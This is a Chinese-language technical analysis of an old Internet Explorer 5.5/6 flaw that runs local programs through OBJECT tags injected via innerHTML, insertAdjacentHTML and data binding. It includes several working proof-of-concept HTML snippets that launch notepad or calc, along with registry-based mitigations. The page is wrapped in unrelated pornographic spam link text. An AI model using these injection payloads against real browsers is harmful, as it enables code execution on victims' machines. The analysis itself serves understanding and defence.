亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來到蟲蟲下載站! | ?? 資源下載 ?? 資源專輯 ?? 關于我們
? 蟲蟲下載站

?? 關于ie執行任意程序漏洞的深入分析.txt

?? 可以對黑客編程有一定的了解
?? TXT
字號:
關于IE執行任意程序漏洞的深入分析



關于IE執行任意程序漏洞的深入分析

目錄:
  1.  漏洞回顧
  2.  進一步追蹤
  3.  IE可本地執行任意命令分析
  4.  IE的ActiveX安全設置可被繞過分析
  5.  擴展:擴展:IE的DHTML實現中關于html源碼再解析部分和IE的安全機制脫節
  6.  臨時解決方法
  7.  測試環境
  8.  參考
  9.  感謝

<1> 漏洞回顧

  Bugtraq 3867描述了IE允許惡意網站在瀏覽其網頁的客戶機上執行任意程序。
  如果你不了解該漏洞的信息請參閱:
    http://magazine.nsfocus.com/detail.asp?id=1192

原文的示例簡化如下:

<HTML>
<SCRIPT LANGUAGE="JScript">
  var oPopup = window.createPopup();
  var oPopBody = oPopup.document.body;
  html='<OBJECT ';
  html+='CLASSID="CLSID:11111111-1111-1111-1111-111111111111"'
  html+='CODEBASE="c:/windows/notepad.exe"></OBJECT>'
  /* 注意:上面的notepad.exe的路徑請修改為你系統對應的路徑 */
  oPopBody.innerHTML = html;
  oPopup.show(290, 190, 200, 200, document.body);
</script>
</html>

  在你的WEB服務器上創建如上一個html文件,然后打開IE鍵入該文件的URL,那么
在你的機器上會打開一個記事本(對IE6和5.5有效)。原文認為其原理為:當使用
window.PoPup()或window.Open()調用創建一個新對象時,如果對象的CODEBASE
值指向一個客戶機上的可執行程序時,程序就會被執行。個人認為其描述沒有抓住漏
洞的本質。

<2> 進一步追蹤

  如果你把html文件內容修改如下:

<body></body>
<SCRIPT>
html='<OBJECT CLASSID="CLSID:12345678" '
html+=' CODEBASE="c:/windows/notepad.exe"></OBJECT>';
/* 注意:上面的notepad.exe的路徑請修改為你系統對應的路徑 */
document.body.innerHTML=html;
</SCRIPT>

  你再訪問該URL時你會發現兩次效果相同,同時你能看到我們的文件中沒有window
.createPopup也沒有window.open,很明顯以前的描述并不準確。漏洞的真實面紗
還未顯現。

  其實,這段代碼幕后隱含的問題遠遠沒有代碼本身看起來那樣簡單,其內部包含了
IE的兩個bug:

   1) IE可本地執行任意命令。
   2) IE的ActiveX安全設置可被繞過。

<3> BUG1: IE可本地執行任意命令

  相信你已經看到了上述代碼里核心的一段是:
  <OBJECT
    CLASSID="CLSID:12345678"
    CODEBASE="c:/windows/notepad.exe">
  </OBJECT>

  寫一個test.html,放入以上內容,然后雙擊用IE打開此html文件,記事本被
打開。
  如果你是一個已經使用過IE調用ActiveX控件的話那么以下文字是在浪費你的
時間,建議你跳過 :)

  在IE中<object>標簽其實就是引用一個ActiveX控件,具體的控件以ID號對應,
如媒體播放器控件號: 22D6f312-B0F6-11D0-94AB-0080C74C7E95,執行命名
控件:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B等。這些控件中部分是系統提
供的,也有安裝一些軟件時這些軟件中提供的如安裝Office后系統中就會多很多控
件,還有就是用戶自己提供的(想更多的了解ActiveX知識網上有很多資料)。

  當IE看到一個<object>引用時首先根據CLASSID在系統中查找該控件,如果沒
有找到,那么就認為系統目前還沒有安裝改控件,然后根據codebase去試圖下載
并安裝該控件,當然試圖下載并安裝控件這個過程受到IE安全設置的限制。

  在通常情況下IE對控件的管理能很好的工作,如你能在頁面上看電影,能在頁面
上看Flash等。當你還沒有安裝Flash播放軟件而瀏覽一個帶Flash的網頁時IE
會提示你是否安裝Flash播放器,如果你要安裝,那么IE就根據codebase去下載
并安裝Flash播放器,當然同時播放器會在系統中注冊其控件。

  但在特殊情況下IE卻開始犯毛病了,如我們的上述代碼,我們給IE指定了一個系統
中并不存在的控件號,此時IE會試圖從codebase指定的地址去下載并安裝改控件。
根據codebase于是IE找到了c:/windows/notepad.exe接著IE“下載”并安裝該程序
。這個動作中的下載就是copy該文件到IE使用的"Downloaded Program Files"目
錄下,然后開始"安裝"該控件,我們的是EXE文件其實就是運行該文件,所以當然就彈
出了文本編輯器!當然在此過程中還有很多復雜的動作:檢測ID號是否正確、檢測系統注冊表中是否有 該控件、檢測已經下載的文件目錄中是否已經下載該文件、"下載"文件到Downloaded Program Files目錄 命名為set????.tmp、rename該tmp文件為
原文件名、檢查文件類型并作相應”安裝“動作“等。

  那么為什么IE在這個“下載安裝控件”過程中不提示用戶,也不應用IE安全設置中的限定進行檢測? 主要原因是IE安全設置中的設置都是針對非本地的頁面或交互的。對于本地的安全設置IE是最大信任 的。如果你注意看IE的安全設置,他是對Internet
和Intranet上WEB服務器而言的,根本就沒有對本地文件的安全設置。

  概括說來就是由于我們的頁面在本地,又是通過雙擊打開的即IE解釋的是本地文件,而同時”下 載“的控件--"c:/windows/notepad.exe"--也是在本地系統上的,也就是這兩個過程都是本地的,那 么IE的安全設置均無效__本地最大信任嘛。


<4> Bug2: IE的ActiveX安全設置可被繞過分析

  如果你把test.html的codebase改為" http://ip/notepad.exe ",(ip對應你
的web服務器IP地址)并且在相應位置放一個notepad.exe,然后雙擊用IE打開
test.html,你會發現IE給出警告框。這是因為你試圖下載的控件在Internet或
Intranet上,IE安全設置生效。

  如果你把test.html不作任何修改(即codebase仍為c:/windows/notepad.exe)
放到你的web服務器上,然后用IE訪問,此時你發現IE仍給出警告框。這是由于你的頁面是來自非本地 的受到IE安全設置的限制。

  那么這段代碼:

<body></body>
<SCRIPT>
html='<OBJECT CLASSID="CLSID:12345678" '
html+=' CODEBASE="c:/windows/notepad.exe"></OBJECT>';
document.body.innerHTML=html;
</SCRIPT>

  放到你的網站上又是如何做到讓你訪問時運行記事本程序,而沒有受IE安全設置限
制呢?

  從上面的分析我們已經知道如果能做到本地頁面,codebase又是本地文件就能受最
大信任。我們本來的目的就是運行本地程序,codebase當然指向本地,兩個條件中已
經滿足一個了,還有一個就是如何讓IE認為頁面是本地頁面!因為你的頁面肯定不是
本地頁面,是IE從網站上下回來的,按理說是不可能作到這一點的,但這卻又真的發
生了,我們知道DHTML中很多對象都有一個innerHTML屬性,通過修改某對象的
innerHTML值就相當于修改該對象的html代碼。修改innerHTML就能修改頁面本身,
修改后IE將重新解釋修改的部分,而IE5.5/IE6卻在解釋innerHTML的賦值時認為這
是一個本地動作,因為賦值操作是在頁面下回來后進行的,IE認為這段代碼是本地代
碼!!于是不該發生的一切就這樣發生了。

  上面的那段代碼在IE下載頁面時HTML中沒有<object>,里面的"<object>"屬于
一個字符串而已,但下載回來后進行解釋時自己對自己的頁面進行了一個賦值,賦值
完成后這個頁面的HTML代碼就是:

  <OBJECT
    CLASSID="CLSID:12345678"
    CODEBASE="c:/windows/notepad.exe">
  </OBJECT>

  修改了整個頁面的代碼。賦值完成后IE重新解釋頁面。于是你就看到了記事本。

  當然你也可以把那段代碼改寫為:

<body><div id=test ></div></body>
<SCRIPT>
html='<OBJECT CLASSID="CLSID:12345678" '
html+=' CODEBASE="c:/windows/notepad.exe"></OBJECT>';
test.innerHTML=html;
</SCRIPT>

<5> 擴展:IE的DHTML實現中關于html源碼再解析部分和IE的安全機制脫節

   通過上面分析現在我們已經知道IE對向innerHTML賦值后再次解釋時使用了
本地權限,使得其安全策略失效,innerHTML賦值屬于動態頁面修改的范疇,
那么是否IE對于整個動態頁面修改的實現上都有問題呢?

  我們寫如下代碼(test.html)測試一下:
<body><div id='test'></div></body>
<SCRIPT language=JScript>
test.insertAdjacentHTML("afterEnd","<OBJECT CLASSID='CLSID:
12345678' CODEBASE='c:/windows/notepad.exe' ></OBJECT>");
</SCRIPT>

  將這個頁面本地雙擊打開,我們看到記事本出來了,同樣放到網上,通過IE
連接相關URL打開記事本也被打開,可見IE在整個html再次分析時都有問題。
其他跟動態頁面修改的方法還有insertAdjacentElement、動態數據綁定等。
但經測試createElement(htmlStr)不受再次解釋問題影響。

  動態頁面修改不使用script仍然有很多方法,主要是通過動態數據綁定。

  舉例來說有:
    方法一:  使用數據操作控件

    寫一HTML文件test.html,內容如下:

<object id=test classid="clsid:333c7bc4-460f-11d0-bc04-0080c7055a83">
<param name="DataURL" value="test.txt">
<param name="UseHeader" value="true">
</object>
<table datasrc=#test>
  <tr>
    <td><div datafld="contex" dataformatas="html"></div></td>
  </tr>
</table>

   再寫一個文件test.txt,內容如下: (兩行,請修改notepad.exe的位置和你一致)
contex<OBJECT CLASSID='CLSID:12345678' CODEBASE='c:/win98/notepad.exe'></OBJECT>

    將這兩個文件放到你的web服務器的根目錄下,然后通過IE訪問,你將發現記事本被打開,在這個 實現中我們沒有使用腳本!

    說明:以上代碼依賴IE安裝時自帶安裝的動態數據處理控件,所以你的IE設置的
  ActiveX 應該允許運行(默認情況下是允許的)。


    方法二:使用xml,參考http://security.greymagic.com/adv/gm001-ie/提供的
  方法是使用如下html文件實現:

<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
    <security>
        <exploit>
            <![CDATA[
            <object id="oFile"
classid="clsid:11111111-1111-1111-1111-111111111111"
codebase="c:/winnt/system32/calc.exe"></object>
            ]]>
        </exploit>
    </security>
</xml>

    說明: 該代碼內沒有任何控件引用,所以你即使在安全設置中禁用ActiveX控件也能工作,原理一 樣。主要是新版的IE將xml解釋內置所以可直接不調用任何控件實現動態數據綁定,而綁定的數據作為 html解釋也就實現了動態html修改。


<6> 臨時解決方法

    明白其原理后就有相應的解決方案了,對于第二個問題二次HTML解釋問題是IE程序實現上的問題 我們無能為力,我們能做的就是堵住ActiveX的下載安裝。

   如果是2k/xp可通過一些權限設置來堵住其”下載安裝“這一步,但常會伴隨副作用。主要是對 Downloaded Program Files目錄設置不可執行,不可寫等權限。

   同時我們看到,二次解釋后的代碼得到的是本地計算機的權限,那么我們可以對IE本地進行權限設 置,禁止本地代碼下載ActiveX控件也可以得到相應的效果。

   但是我們如何對本地權限設置呢?IE的安全設置里只有Internet、本地Intranet、
受限制的站點、受信任的站點的設置,沒有對本機的設置!

   根據scz的分析:注冊表中
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
InternetSettings\Zones\]下有5項,后面的1,2,3,4對應就是你在IE安全設置中看到
的4項,第一個0就是本地計算機,默認看不到,如果把0\Flags值修改為十六進制的47那么你就能發現IE 的安全設置中多了一項“我的電腦”。這就是我們苦苦追尋的IE本地權限的控制中心!!!

   好了,現在到IE安全設置中\我的電腦\下禁用ActiveX下載就一切OK了。不就是IE的問題導致網上的 HTML代碼能取得本地代碼權限,然后本地代碼再下載ActiveX,而IE默認本地代碼最大信任,有權下載 控件才造成這一系列的問題嗎?現在得到本地權限也不能下載ActiveX了,呵呵世界清凈了!


<7> 測試環境

    IE6          pwin98 & NT4(sp6)  受影響
    IE5.5(sp2)   win2k(sp2)         受影響
    IE5          win2k(sp2)         不受影響

    WEB服務器用的是https。

    理論上所有IE都會有第一個問題。


<8> 參考資料
    http://www.liquidwd.freeserve.co.uk/
    http://magazine.nsfocus.com/detail.asp?id=1192
    http://msdn.microsoft.com/library/default.asp?url=/workshop/entry.asp
    http://security.greymagic.com/adv/gm001-ie/

?? 快捷鍵說明

復制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號 Ctrl + =
減小字號 Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
欧美性xxxxxx少妇| 国产精品婷婷午夜在线观看| 国产视频亚洲色图| 亚洲一区在线视频观看| 国产成人在线观看免费网站| 欧美三级韩国三级日本三斤| 欧美激情一区二区三区| 日韩av在线发布| 91在线视频播放地址| 亚洲精品国产品国语在线app| 亚洲一二三四在线| 成人免费视频国产在线观看| 欧美一区二区成人6969| 亚洲精品综合在线| 国产成人综合亚洲91猫咪| 欧美日韩在线三级| 亚洲日本在线视频观看| 国产成人亚洲综合a∨婷婷| 日韩网站在线看片你懂的| 亚洲成人资源网| 91黄视频在线观看| 亚洲视频免费在线观看| 国产成人在线免费观看| 久久久不卡网国产精品二区 | 久久久久久毛片| 日韩中文字幕亚洲一区二区va在线| 99re视频精品| 亚洲色图20p| 97久久超碰国产精品| 中文字幕精品一区| 国产精品99久久久久久宅男| 日韩欧美卡一卡二| 秋霞午夜av一区二区三区| 欧美日韩美女一区二区| 亚洲国产欧美在线人成| 欧美色图在线观看| 偷拍一区二区三区| 日韩一区二区三| 精品亚洲免费视频| 久久久精品蜜桃| 成人高清在线视频| 亚洲三级电影网站| 欧美日韩一区二区在线观看 | 91搞黄在线观看| 亚洲精品免费播放| 欧美日韩国产天堂| 蜜桃久久av一区| 久久亚洲综合色一区二区三区| 国产尤物一区二区| 国产精品国产三级国产aⅴ入口| 波多野结衣精品在线| 最好看的中文字幕久久| 欧美系列一区二区| 免费观看一级特黄欧美大片| 精品国产一区二区亚洲人成毛片| 国内外精品视频| 中文字幕一区二区日韩精品绯色 | 国产综合一区二区| 亚洲国产成人一区二区三区| 91女厕偷拍女厕偷拍高清| 亚洲一区二区三区中文字幕 | 久久久蜜臀国产一区二区| 国产一区二区三区日韩| 国产精品久久久久9999吃药| 日本韩国精品在线| 日韩电影在线观看电影| 国产欧美综合色| 欧美系列一区二区| 国产高清不卡一区二区| 一区二区三区美女| 亚洲精品一区二区三区在线观看| 欧美老肥妇做.爰bbww视频| 国产在线乱码一区二区三区| 亚洲欧美日韩国产另类专区| 91精品午夜视频| av成人免费在线| 日日夜夜免费精品| 国产精品麻豆久久久| 欧美三级中文字幕在线观看| 国内成人精品2018免费看| 亚洲精品乱码久久久久久| 精品国产乱码久久久久久1区2区| 色综合久久88色综合天天免费| 麻豆视频一区二区| 亚洲免费观看在线观看| 26uuuu精品一区二区| 精品视频一区二区三区免费| 福利91精品一区二区三区| 日韩精品一二三四| 亚洲乱码中文字幕| 欧美激情在线一区二区| 欧美成人艳星乳罩| 欧美喷潮久久久xxxxx| eeuss鲁片一区二区三区在线观看| 卡一卡二国产精品 | 欧美性猛片xxxx免费看久爱| 国产精品一二三| 久久成人免费网| 日本三级韩国三级欧美三级| 依依成人综合视频| 亚洲色图欧洲色图婷婷| 国产精品免费视频网站| 久久久久国色av免费看影院| 日韩一级黄色大片| 欧美美女视频在线观看| 欧美性色黄大片手机版| 一本色道久久综合亚洲91| www.在线成人| a在线欧美一区| 日韩视频一区二区在线观看| 在线观看中文字幕不卡| 97久久超碰国产精品| 成人app在线| 成人精品国产一区二区4080| 国产不卡视频一区二区三区| 国产精品正在播放| 国产精品1区2区3区在线观看| 黄一区二区三区| 国产乱码精品一区二区三区五月婷| 另类的小说在线视频另类成人小视频在线 | 国产网站一区二区三区| 日韩美女天天操| 久久中文字幕电影| 日本一区二区三区在线观看| 国产午夜精品一区二区三区四区| 久久精品欧美日韩| 国产精品国产精品国产专区不蜜| 日本一区二区久久| 亚洲欧洲日韩在线| 一区二区三区四区蜜桃 | 欧美亚洲免费在线一区| 欧美午夜精品久久久久久孕妇| 欧美色精品在线视频| 欧美伦理电影网| 日韩免费一区二区| 日本不卡视频在线| 国产剧情一区在线| 99久免费精品视频在线观看| 日本道色综合久久| 欧美日韩精品免费观看视频| 欧美一个色资源| 久久久精品欧美丰满| 亚洲婷婷综合久久一本伊一区| 亚洲午夜久久久久久久久久久| 亚洲国产日日夜夜| 久久不见久久见中文字幕免费| 国产福利一区二区| 在线观看国产日韩| 久久先锋资源网| 一区二区三区四区精品在线视频| 日本欧美一区二区三区乱码| 国产乱码精品1区2区3区| 色哟哟国产精品| 日韩精品一区二区三区在线观看 | 日韩一区二区精品葵司在线| 久久精品这里都是精品| 亚洲精品欧美综合四区| 九九国产精品视频| 色综合天天视频在线观看| 日韩一区二区电影在线| 亚洲色图欧洲色图婷婷| 国内外成人在线| 欧洲生活片亚洲生活在线观看| 精品欧美一区二区久久| 樱桃国产成人精品视频| 国产成人综合在线播放| 51久久夜色精品国产麻豆| 国产精品久久久久桃色tv| 免费观看91视频大全| 在线视频欧美精品| 欧美韩国日本一区| 久久精品国内一区二区三区| 欧美xxxxx牲另类人与| 樱花影视一区二区| 国产成人午夜99999| 日韩丝袜情趣美女图片| 亚洲午夜私人影院| 色综合久久六月婷婷中文字幕| 久久久久国产免费免费 | 欧美成人高清电影在线| 亚洲一区二区三区在线| heyzo一本久久综合| 久久精品一区二区三区不卡| 亚洲不卡在线观看| 色呦呦国产精品| 综合网在线视频| 成人免费av网站| 久久精品视频免费观看| 精品一区精品二区高清| 日韩三级精品电影久久久| 亚洲成人黄色影院| 国产亚洲欧洲997久久综合| 欧美色手机在线观看| 国产日韩欧美a| 黑人巨大精品欧美黑白配亚洲| 欧美少妇一区二区| 亚洲综合在线电影| 欧美日韩中文国产| 婷婷综合久久一区二区三区| 欧美日韩一级片在线观看|